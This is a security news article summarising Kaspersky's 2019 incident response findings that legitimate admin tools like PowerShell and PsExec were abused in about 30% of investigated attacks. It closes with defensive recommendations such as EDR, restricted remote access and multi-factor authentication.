Connect with us

Hi, what are you looking for?

HEADLINES

Attackers misuse legitimate tools in 30% of successful cyber-incidents

Almost a third (30%) of cyberattacks investigated by the Kaspersky Global Emergency Response team in 2019 involved legitimate remote management and administration tools.

Almost a third (30%) of cyberattacks investigated by the Kaspersky Global Emergency Response team in 2019 involved legitimate remote management and administration tools. As a result, attackers can remain undetected for a longer period of time. For instance, continuous cyber-espionage attacks and theft of confidential data had a median duration of 122 days. These findings are from Kaspersky’s new Incident Response Analytics Report.

Monitoring and management software helps IT and network administrators perform their everyday tasks, such as troubleshooting and providing employees with technical support. However, cybercriminals can also leverage these legitimate tools during cyberattacks on a company’s infrastructure. This software allows them to run processes on endpoints, access and extract sensitive information, bypassing various security controls aimed to detect malware.   

In total, the analysis of anonymized data from incident response (IR) cases showed that 18 various legitimate tools were abused by attackers for malicious purposes. The most widely used one was PowerShell (25% of cases). This powerful administration tool can be used for many purposes, from gathering information to running malware. PsExec was leveraged in 22% of the attacks. This console application is intended for launching processes on remote endpoints. This was followed by SoftPerfect Network Scanner (14%), which is intended to retrieve information about network environments.  

It is more difficult for security solutions to detect attacks conducted with legitimate tools because these actions can be both part of a planned cybercrime activity or a regular system administrator task. For instance, in the segment of attacks that lasted more than a month, the cyber-incidents had a median duration of 122 days. As they were undetected, cybercriminals could collect victims’ sensitive data. 

Advertisement. Scroll to continue reading.

However, Kaspersky experts note that sometimes malicious actions with legitimate software reveal themselves rather quickly. For example, they are often used in a ransomware attack, and the damage is seen clearly. The median attack duration for short attacks was a day.

“To avoid detection and stay invisible in a compromised network for as long as possible, attackers widely used software which is developed for normal user activity, administrator tasks and system diagnostics. With these tools, attackers can gather information about corporate networks and then conduct lateral movement, change software and hardware settings or even carry out some form of malicious action. For example, they could use legitimate software to encrypt customer data,” comments Konstantin Sapronov, Head of Global Emergency Response Team at Kaspersky.

“Legitimate software can also help attackers stay under the radar of security analysts, as they often detect the attack only after the damage has been done. It is not possible to exclude these tools for many reasons, however, properly deployed logging and monitoring systems will help to detect suspicious activity in the network and complex attacks at earlier stages,” adds Sapronov.

To detect and react to such attacks in a timely manner, among other measures, organizations should consider implementing an Endpoint Detection and Response (EDR) solution with an MDR service. MITRE ATT&CK Round 2 Evaluation — where various solutions, including Kaspersky EDR and Kaspersky Managed Protection service were evaluated — can help customers choose EDR products that match their specific organization’s needs. The results of the ATT&CK Evaluation prove the importance of a comprehensive solution that combines a fully automated multi-layered security product and a manual threat hunting service.

To minimize the chances of remote management software being used to penetrate an infrastructure, Kaspersky also recommends the following measures: 

Advertisement. Scroll to continue reading.
  • Restrict access to remote management tools from external IP addresses. Ensure that remote control interfaces can only be accessed from a limited number of endpoints
  • Enforce a strict password policy for all IT systems and deploy multi-factor authentication
  • Follow the principle of offering staff limited privileges and grant high-privileged accounts only to those who need this to fulfill their job 

Advertisement
Advertisement
Advertisement

Like Us On Facebook

You May Also Like

White Papers

When compared to 2023, Sophos saw a 51% increase in abusing “Living off the Land” binaries or LOLbins; since 2021, it’s increased by 83%.

HEADLINES

Someone illegally acquires or uses personal information such as bank account or credit card numbers of another person to obtain money, goods or services....

HEADLINES

To stay ahead of these challenges, organizations need to invest in AI-driven defenses, transition to quantum-safe encryption, and adopt a Zero Trust approach to...

HEADLINES

There was a 121% Year-on-Year (YoY) increase in identity fraud in 2024 across the region, with significant surges recorded in Singapore (207%), Thailand (206%)...

HEADLINES

As part of RCBC’s 2024 Cybersecurity literacy program, the webinar aims to help Filipinos level up their online banking safety by providing them with...

White Papers

The survey found that CXO’s feel less prepared than their global peers. Less than half or 48% in APAC said they felt completely prepared...

HEADLINES

On average, a single organization in the Philippines experiences 4,003 attacks per week, significantly higher than the APAC average of 2,870 attacks per week.

White Papers

Exploiting this vulnerability, cybercriminals craft deceptively authentic phishing emails that align with current trends, exploiting human emotions to invoke urgency and trick recipients into...

Advertisement